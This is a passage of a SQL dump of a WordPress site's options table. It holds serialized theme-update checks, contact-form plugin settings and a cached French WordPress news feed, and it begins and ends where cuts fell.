(204, '_site_transient_update_themes', 'O:8:\"stdClass\":4:{s:12:\"last_checked\";i:1546171546;s:7:\"checked\";a:4:{s:13:\"twentyfifteen\";s:3:\"2.0\";s:15:\"twentyseventeen\";s:3:\"1.7\";s:13:\"twentysixteen\";s:3:\"1.5\";s:10:\"zerif-lite\";s:8:\"1.8.5.44\";}s:8:\"response\";a:4:{s:13:\"twentyfifteen\";a:4:{s:5:\"theme\";s:13:\"twentyfifteen\";s:11:\"new_version\";s:3:\"2.2\";s:3:\"url\";s:43:\"https://wordpress.org/themes/twentyfifteen/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/theme/twentyfifteen.2.2.zip\";}s:15:\"twentyseventeen\";a:4:{s:5:\"theme\";s:15:\"twentyseventeen\";s:11:\"new_version\";s:3:\"1.9\";s:3:\"url\";s:45:\"https://wordpress.org/themes/twentyseventeen/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/theme/twentyseventeen.1.9.zip\";}s:13:\"twentysixteen\";a:4:{s:5:\"theme\";s:13:\"twentysixteen\";s:11:\"new_version\";s:3:\"1.7\";s:3:\"url\";s:43:\"https://wordpress.org/themes/twentysixteen/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/theme/twentysixteen.1.7.zip\";}s:10:\"zerif-lite\";a:4:{s:5:\"theme\";s:10:\"zerif-lite\";s:11:\"new_version\";s:8:\"1.8.5.48\";s:3:\"url\";s:40:\"https://wordpress.org/themes/zerif-lite/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/theme/zerif-lite.1.8.5.48.zip\";}}s:12:\"translations\";a:0:{}}', 'no'),
(217, '_transient_timeout_feed_mod_9bc1b9ec726e1f508c5207949084454a', '1546214673', 'no'),
(218, '_transient_feed_mod_9bc1b9ec726e1f508c5207949084454a', '1546171473', 'no'),
(219, '_transient_timeout_themeisle_sdk_feed_items', '1546344273', 'no'),
(220, '_transient_themeisle_sdk_feed_items', 'a:5:{i:0;a:3:{s:5:\"title\";s:69:\"How to Create Viral Content on Your WordPress Blog (4 Key Strategies)\";s:4:\"date\";i:1546002556;s:4:\"link\";s:48:\"https://themeisle.com/blog/create-viral-content/\";}i:1;a:3:{s:5:\"title\";s:133:\"Alex Denning Interview – “A marketing agency that wasn’t very popular with clients would not be a very good marketing agency”\";s:4:\"date\";i:1545922756;s:4:\"link\";s:77:\"https://themeisle.com/blog/alex-denning-interview-on-marketing-and-wordpress/\";}i:2;a:3:{s:5:\"title\";s:82:\"7 Great News Aggregator Websites You Should Check Out (Plus How to Build Your Own)\";s:4:\"date\";i:1545647146;s:4:\"link\";s:61:\"https://themeisle.com/blog/news-aggregator-websites-examples/\";}i:3;a:3:{s:5:\"title\";s:54:\"What Is WebP? Plus How to Use WebP Images in WordPress\";s:4:\"date\";i:1545295150;s:4:\"link\";s:40:\"https://themeisle.com/blog/what-is-webp/\";}i:4;a:3:{s:5:\"title\";s:68:\"How to Take a Screenshot on a Windows and Mac Computer: Step-by-Step\";s:4:\"date\";i:1545212252;s:4:\"link\";s:57:\"https://themeisle.com/blog/how-to-screenshot-on-computer/\";}}', 'no'),
(221, '_transient_timeout_themeisle_sdk_products', '1546193075', 'no'),
(173, 'pirate_forms_settings_array', 'a:40:{s:20:\"pirateformsopt_email\";s:36:\"wordpress@dev.crosstrainingcenter.be\";s:31:\"pirateformsopt_email_recipients\";s:12:\"stv@otvr.net\";s:20:\"pirateformsopt_store\";s:2:\"no\";s:23:\"pirateformsopt_store_ip\";s:2:\"no\";s:20:\"pirateformsopt_nonce\";s:3:\"yes\";s:28:\"pirateformsopt_confirm_email\";s:0:\"\";s:25:\"pirateformsopt_copy_email\";s:0:\"\";s:30:\"pirateformsopt_save_attachment\";s:0:\"\";s:28:\"pirateformsopt_thank_you_url\";s:0:\"\";s:22:\"pirateformsopt_akismet\";s:0:\"\";s:25:\"pirateformsopt_name_field\";s:3:\"req\";s:26:\"pirateformsopt_email_field\";s:3:\"req\";s:28:\"pirateformsopt_subject_field\";s:3:\"req\";s:28:\"pirateformsopt_message_field\";s:3:\"req\";s:31:\"pirateformsopt_attachment_field\";s:0:\"\";s:29:\"pirateformsopt_checkbox_field\";s:0:\"\";s:30:\"pirateformsopt_recaptcha_field\";s:3:\"yes\";s:32:\"pirateformsopt_recaptcha_sitekey\";s:0:\"\";s:34:\"pirateformsopt_recaptcha_secretkey\";s:0:\"\";s:25:\"pirateformsopt_label_name\";s:9:\"Your Name\";s:26:\"pirateformsopt_label_email\";s:10:\"Your Email\";s:28:\"pirateformsopt_label_subject\";s:7:\"Subject\";s:28:\"pirateformsopt_label_message\";s:12:\"Your message\";s:31:\"pirateformsopt_label_submit_btn\";s:12:\"Send Message\";s:29:\"pirateformsopt_label_checkbox\";s:0:\"\";s:28:\"pirateformsopt_email_content\";s:493:\"<h2>Contact form submission from Cross Training Namur (http://dev.crosstrainingcenter.be)</h2><table><tr><th>Name:</th><td>{name}</td></tr><tr><th>Email:</th><td>{email}</td></tr><tr><th>Subject:</th><td>{subject}</td></tr><tr><th>Message:</th><td>{message}</td></tr><tr><th>Checkbox:</th><td>{checkbox}</td></tr><tr><th>IP search:</th><td>http://whatismyipaddress.com/ip/{ip}</td></tr><tr><th>Came from:</th><td>{referer}</td></tr><tr><th>Sent from page:</th><td>{permalink}</td></tr></table>\";s:29:\"pirateformsopt_label_err_name\";s:15:\"Enter your name\";s:30:\"pirateformsopt_label_err_email\";s:17:\"Enter valid email\";s:32:\"pirateformsopt_label_err_subject\";s:22:\"Please enter a subject\";s:35:\"pirateformsopt_label_err_no_content\";s:30:\"Enter your question or comment\";s:38:\"pirateformsopt_label_err_no_attachment\";s:24:\"Please add an attachment\";s:36:\"pirateformsopt_label_err_no_checkbox\";s:26:\"Please select the checkbox\";s:27:\"pirateformsopt_label_submit\";s:41:\"Thanks, your email was sent successfully!\";s:23:\"pirateformsopt_use_smtp\";s:0:\"\";s:24:\"pirateformsopt_smtp_host\";s:0:\"\";s:24:\"pirateformsopt_smtp_port\";s:0:\"\";s:38:\"pirateformsopt_use_smtp_authentication\";s:3:\"yes\";s:25:\"pirateformsopt_use_secure\";s:0:\"\";s:28:\"pirateformsopt_smtp_username\";s:0:\"\";s:28:\"pirateformsopt_smtp_password\";s:0:\"\";}', 'yes'),
(225, '_transient_timeout_feed_mod_66a70e9599b658d5cc038e8074597e7c', '1546214676', 'no'),
(226, '_transient_feed_mod_66a70e9599b658d5cc038e8074597e7c', '1546171476', 'no');
INSERT INTO `ct_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(228, '_transient_feed_76f8d9281c01f21e505004d0986f50c6', 'a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:5:\"\n		\n	\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:79:\"\n		\n		\n		\n		\n		\n		\n					\n						\n						\n						\n						\n						\n						\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"Planète WordPress Francophone\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:17:\"https://wpfr.net/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"Toute l’actualité de WordPress en français !\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"fr-FR\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:8:{i:0;a:6:{s:4:\"data\";s:84:\"\n		        \n		        \n		        \n		        \n		        \n		        \n		        \n		    \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"Installer WordPress en 3 minutes !\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"http://feedproxy.google.com/~r/wpfr/~3/mxn85Rp8tWk/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"https://www.thivinfo.com/blog/tutoriels/installer-wordpress-en-3-minutes/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 28 Dec 2018 16:41:57 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:692:\"\n		        On lit partout qu&#8217;il faut 5 minutes pour installer WordPress&#8230; et c&#8217;est FAUX ! On nous a menti! On peut l&#8217;installer beaucoup plus rapidement que ca&#8230; La preuve en vidéo! Ceux d&#8217;entre vous ayant déjà installé un multisite savent qu&#8217;après avoir installé WordPress, il faut rentrer des constantes dans le wp-config.php pour activer ce mode, se rendre dans le Back-Office, paramétrer le reseau et revenir dans le wp-config.php pour y coller un pavé de constantes ainsi que dans le .htaccess&#8230; bref largement plus qu&#8217;avec le script que je vous ai concocté! Comment ca marche? J&#8217;ai créé un script bash qui,…		        \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:762:\"On lit partout qu&#8217;il faut 5 minutes pour installer WordPress&#8230; et c&#8217;est FAUX ! On nous a menti! On peut l&#8217;installer beaucoup plus rapidement que ca&#8230; La preuve en vidéo! Ceux d&#8217;entre vous ayant déjà installé un multisite savent qu&#8217;après avoir installé WordPress, il faut rentrer des constantes dans le wp-config.php pour activer ce mode, se rendre dans le Back-Office, paramétrer le reseau et revenir dans le wp-config.php pour y coller un pavé de constantes ainsi que dans le .htaccess&#8230; bref largement plus qu&#8217;avec le script que je vous ai concocté! Comment ca marche? J&#8217;ai créé un script bash qui,…<img src=\"http://feeds.feedburner.com/~r/wpfr/~4/mxn85Rp8tWk\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"https://www.thivinfo.com/blog/tutoriels/installer-wordpress-en-3-minutes/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:84:\"\n		        \n		        \n		        \n		        \n		        \n		        \n		        \n		    \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"Créer vos blocs Gutenberg facilement avec Carbon Fields\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"http://feedproxy.google.com/~r/wpfr/~3/penBqnXRVWY/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:96:\"https://www.thivinfo.com/blog/tutoriels/creer-vos-blocs-gutenberg-facilement-avec-carbon-fields/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 24 Dec 2018 14:10:58 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:689:\"\n		        Présentation de Carbon Fields Carbon Fields est une solution concurrente du célèbre Advanced Custom Field (ACF) mais qui a la particularité de pouvoir être embarqué dans vos thèmes et extensions maison. En effet, vous ne pouvez pas utiliser ACF Pro dans vos extensions gratuites a destination par exemple du dépôt WordPress. Comme ACF, Carbon Fields propose une solution entièrement en PHP pour créer des blocs compatibles avec le nouvel éditeur de WordPress: Gutenberg! Les blocs Gutenberg ont fait leur apparition dans Carbon Fields 3.0. Installer Carbon Fields Attention, la version disponible sur le dépôt WordPress est loin d&#8217;être à jour.…		        \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:759:\"Présentation de Carbon Fields Carbon Fields est une solution concurrente du célèbre Advanced Custom Field (ACF) mais qui a la particularité de pouvoir être embarqué dans vos thèmes et extensions maison. En effet, vous ne pouvez pas utiliser ACF Pro dans vos extensions gratuites a destination par exemple du dépôt WordPress. Comme ACF, Carbon Fields propose une solution entièrement en PHP pour créer des blocs compatibles avec le nouvel éditeur de WordPress: Gutenberg! Les blocs Gutenberg ont fait leur apparition dans Carbon Fields 3.0. Installer Carbon Fields Attention, la version disponible sur le dépôt WordPress est loin d&#8217;être à jour.…<img src=\"http://feeds.feedburner.com/~r/wpfr/~4/penBqnXRVWY\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:96:\"https://www.thivinfo.com/blog/tutoriels/creer-vos-blocs-gutenberg-facilement-avec-carbon-fields/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:84:\"\n		        \n		        \n		        \n		        \n		        \n		        \n		        \n		    \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:39:\"Installer WordPress sur un NAS Synology\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"http://feedproxy.google.com/~r/wpfr/~3/C5RZVcPhyRo/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:85:\"https://wpchannel.com/wordpress/tutoriels-wordpress/installer-wordpress-nas-synology/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 23 Dec 2018 16:07:53 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:485:\"\n		        Installer WordPress sur un serveur local peut s&#8217;opérer sur un serveur NAS (Network Attached Storage) de type Synology. Ces espaces de stockage en réseau disposent de tous les paquets nécessaires au déploiement d&#8217;un environnement Apache, MariaDB et PHP. Une excellente combinaison pour développer en local sans impacter votre machine de travail quotidienne. C&#8217;est quoi un serveur NAS Synology ? Un serveur NAS pour Network Attached [&#8230;]		        \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"WP Channel\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:746:\"<div class=\"post-thumbnail\"><img width=\"356\" height=\"327\" src=\"https://wpchannel.com/images/2018/12/disque-dur-356x327.jpg\" class=\"attachment-medium size-medium wp-post-image\" alt=\"\" /></div>Installer WordPress sur un serveur local peut s&#8217;opérer sur un serveur NAS (Network Attached Storage) de type Synology. Ces espaces de stockage en réseau disposent de tous les paquets nécessaires au déploiement d&#8217;un environnement Apache, MariaDB et PHP. Une excellente combinaison pour développer en local sans impacter votre machine de travail quotidienne. C&#8217;est quoi un serveur NAS Synology ? Un serveur NAS pour Network Attached [&#8230;]<img src=\"http://feeds.feedburner.com/~r/wpfr/~4/C5RZVcPhyRo\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:85:\"https://wpchannel.com/wordpress/tutoriels-wordpress/installer-wordpress-nas-synology/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:84:\"\n		        \n		        \n		        \n		        \n		        \n		        \n		        \n		    \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:101:\"Présentation de WP GestSup Connector, l’extension qui lie votre site WordPress au helpdesk GestSup\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"http://feedproxy.google.com/~r/wpfr/~3/A5bQPf8MPR4/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:118:\"https://www.thivinfo.com/blog/presentation-de-wp-gestsup-connector-pro-lextension-lie-site-wordpress-helpdesk-gestsup/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 21 Dec 2018 07:30:26 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:752:\"\n		        GestSup, qu&#8217;est ce que c&#8217;est? D&#8217;abord le site web. GestSup est une solution de&#160;gestion de support&#160;auto-hébergée que j&#8217;utilise avec certains de mes clients pour prioriser les interventions et les développements réalisé par Thivinfo. Jusque la j&#8217;avais, comme beaucoup, un formulaire de contact qui m&#8217;envoyait par mail le contenu saisi dans le formulaire en ligne. Ce mail, je le retranscrivais dans GestSup pour créer un ticket&#8230; faire et défaire c&#8217;est toujours travailler mais pendant ce temps la je n&#8217;étais pas productif pour développer les demandes de mes clients. J&#8217;ai donc décidé de créer une extension WordPress qui génrerai un formulaire via…		        \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:822:\"GestSup, qu&#8217;est ce que c&#8217;est? D&#8217;abord le site web. GestSup est une solution de&#160;gestion de support&#160;auto-hébergée que j&#8217;utilise avec certains de mes clients pour prioriser les interventions et les développements réalisé par Thivinfo. Jusque la j&#8217;avais, comme beaucoup, un formulaire de contact qui m&#8217;envoyait par mail le contenu saisi dans le formulaire en ligne. Ce mail, je le retranscrivais dans GestSup pour créer un ticket&#8230; faire et défaire c&#8217;est toujours travailler mais pendant ce temps la je n&#8217;étais pas productif pour développer les demandes de mes clients. J&#8217;ai donc décidé de créer une extension WordPress qui génrerai un formulaire via…<img src=\"http://feeds.feedburner.com/~r/wpfr/~4/A5bQPf8MPR4\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:118:\"https://www.thivinfo.com/blog/presentation-de-wp-gestsup-connector-pro-lextension-lie-site-wordpress-helpdesk-gestsup/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:84:\"\n		        \n		        \n		        \n		        \n		        \n		        \n		        \n		    \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"Comment devenir une agence WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"http://feedproxy.google.com/~r/wpfr/~3/5H31_I6rQls/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:61:\"https://www.whodunit.fr/comment-devenir-une-agence-wordpress/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 20 Dec 2018 09:04:10 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:530:\"\n		        Le 19 octobre 2018 s’est déroulé le&#160;WordCamp Nice, un évènement dédié aux conférences sur WordPress. Rachel, notre lead Theme Dev, était dans l’équipe organisatrice. Consacrer du temps pour aider bénévolement à l’organisation de ces évènements est un des moyens&#160;pour l’agence de contribuer. Être orateur et partager nos expériences est aussi une contribution et cette année [&#8230;]\nThe post Comment devenir une agence WordPress appeared first on Agence WordPress Whodunit.		        \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:758:\"<p>Le 19 octobre 2018 s’est déroulé le&#160;WordCamp Nice, un évènement dédié aux conférences sur WordPress. Rachel, notre lead Theme Dev, était dans l’équipe organisatrice. Consacrer du temps pour aider bénévolement à l’organisation de ces évènements est un des moyens&#160;pour l’agence de contribuer. Être orateur et partager nos expériences est aussi une contribution et cette année [&#8230;]</p>\n<p>The post <a rel=\"nofollow\" href=\"https://www.whodunit.fr/comment-devenir-une-agence-wordpress/\">Comment devenir une agence WordPress</a> appeared first on <a rel=\"nofollow\" href=\"https://www.whodunit.fr\">Agence WordPress Whodunit</a>.</p><img src=\"http://feeds.feedburner.com/~r/wpfr/~4/5H31_I6rQls\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:61:\"https://www.whodunit.fr/comment-devenir-une-agence-wordpress/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:84:\"\n		        \n		        \n		        \n		        \n		        \n		        \n		        \n		    \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"Comment faire vos mises à jour WordPress sans encombres 